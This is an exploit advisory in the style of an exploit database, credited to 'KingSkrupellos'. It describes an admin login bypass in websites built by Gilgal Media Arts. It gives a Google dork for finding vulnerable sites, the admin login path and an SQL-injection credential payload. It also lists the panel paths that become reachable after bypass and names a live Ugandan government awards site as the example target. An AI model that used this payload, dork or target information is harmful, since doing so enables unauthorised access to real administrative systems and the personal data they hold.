################################################################################################# # Exploit Title : Designed & Powered by Gilgal Media Arts Admin Login Bypass Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 23/06/2018 # Vendor Homepage : gilgalmediaarts.com # Tested On : Windows # Category : WebApps # Exploit Risk : Medium # CWE : CWE-592 [ Authentication Bypass Issues ] ################################################################################################# # Google Dork : intext:''Designed & Powered by Gilgal Media Arts'' # Administration Login Panel => /adminlogin.php # Exploit : Username => '=''or' Password => '=''or' # Useable URL Paths in the Control Panel => /users.php /beneficiaries.php /medals.php /personal_category.php /celebration.php /search.php /search_pubaward.php /reportsbackup.php /searchparam.php /searchparamdates.php /pending.php /downloads.html TARGET/reportsbackuppub1.php ################################################################################################# # Note : Only one important government website is vulnerable. Office of the President The Republic of Uganda National Awards is Vulnerable. # Example Site : presidentialawards.go.ug => [ Proof of Concept ] => archive.is/mlnxA ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################